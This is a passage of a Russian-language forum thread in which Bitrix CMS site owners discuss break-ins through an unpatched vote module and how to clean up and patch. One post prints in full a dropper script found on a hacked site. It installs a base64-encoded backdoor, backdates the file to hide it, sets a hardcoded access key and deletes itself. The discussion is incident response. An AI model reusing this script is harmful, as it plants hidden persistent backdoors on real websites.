Цитата |
---|
Никита Калмахелидзе написал: Не мог ли я этими действиями "пустить" вирус, который до этого ломился на сайт, но не мог попасть? |
нет, не мог
09.03.2023 16:41:21
нет, не мог |
|||
|
|
09.03.2023 17:41:27
|
|
|
|
09.03.2023 17:42:06
Он находится в таблице b_option.
|
|
|
|
10.03.2023 09:14:13
Добрый день.
Может где-то писали уже. Вариант внедрений. Папка /bitrix/tools/vote/ создается что-то вроде script-8.php с содержимым <?php @mkdir($_SERVER["DOCUMENT_ROOT"]."/bitrix/tools/vote"); file_put_contents($_SERVER["DOCUMENT_ROOT"]."/bitrix/tools/html_editor_action.php", base64_decode("PD8KJHZsID0gJ2tlJy4neSc7CmlmKCRfUE9TVFsnYnh1X2luZm8nXVsncGFja2FnZUluZGV4J109PT0ncEluZGV4MTAxJyYmJF9QT1NUWyR2bF0hPT0nZ2FkZjRlNTdlJyl7CiAgICBkaWUoImhhY2sgYXR0ZW1wdCIpOwp9CnJlcXVpcmVfb25jZSgkX1NFUlZFUlsiRE9DVU1FTlRfUk9PVCJdLiIvYml0cml4L2FkbWluL2ZpbGVtYW5faHRtbF9lZGl0b3JfYWN0aW9uLnBocCIpOwo/Pg==")); touch($_SERVER["DOCUMENT_ROOT"]."/bitrix/tools/html_editor_action.php",filemtime($_SERVER["DOCUMENT_ROOT"]."/bitrix/index.php")); unlink ($_SERVER["DOCUMENT_ROOT"]."/bitrix/components/bitrix/main.file.input/main.php"); $buf = file_get_contents($_SERVER["DOCUMENT_ROOT"]."/bitrix/js/main/core/core.js"); if(strpos($buf, "s=document")>0) { $buf = preg_replace("!(s=document.*?appendChild\(s\));!ism", "", $buf); file_put_contents($_SERVER["DOCUMENT_ROOT"]."/bitrix/js/main/core/core.js", $buf); }; $buf = file_get_contents($_SERVER["DOCUMENT_ROOT"]."/bitrix/modules/main/include/prolog.php"); if(strpos($buf, "echo ")>0) { $buf = preg_replace("!(echo.*?script>\";)!ism", "", $buf); file_put_contents($_SERVER["DOCUMENT_ROOT"]."/bitrix/modules/main/include/prolog.php", $buf); }; $buf = file_get_contents($_SERVER["DOCUMENT_ROOT"]."/bitrix/modules/fileman/classes/general/html_editor.php"); if(strpos($buf, "spell_word")>0) { $buf = preg_replace("!HTTP_S'] == \".*?\"!ism", "HTTP_S'] == \"g308bad51\"", $buf); file_put_contents($_SERVER["DOCUMENT_ROOT"]."/bitrix/modules/fileman/classes/general/html_editor.php", $buf); }; echo (240222); unlink ("script-8.php"); |
|
|
|
10.03.2023 09:18:17
Макс Кучин,
это говорит о том, что у Вас не обновлённое ядро с уязвимым модулем vote удалите папки /bitrix/tools/vote/ /bitrix/modules/vote/ и главное - обновитесь |
|
|
|
10.03.2023 13:11:26
Всем привет!
Если у кого осталась проблема с постоянной заменой .htaccess и корневого index.php, то можно попробовать следующее:
Удаляем командой, через ту же консоль:
В общем, после выполнения данных процедур проблем пока замечено не было. Удачи с починкой! |
|||||||||||||||
|
|
10.03.2023 15:09:27
появился файл admin.php |
|||||
|
|
11.03.2023 08:35:45
Коллеги, добрый день
Тоже несколько сайтов клиентов были взломаны. По цепочке логов вроде получилось отследить, что через /bitrix/tools/html_editor_action.php и /bitrix/tools/spread.php Подскажите, если я поставил пароль через .htaccess и .htpasswd на папку /bitrix/tools/, ниче для клиентов не должно сломаться?) Или не рекомендуется так делать? |
||||
|
|
|||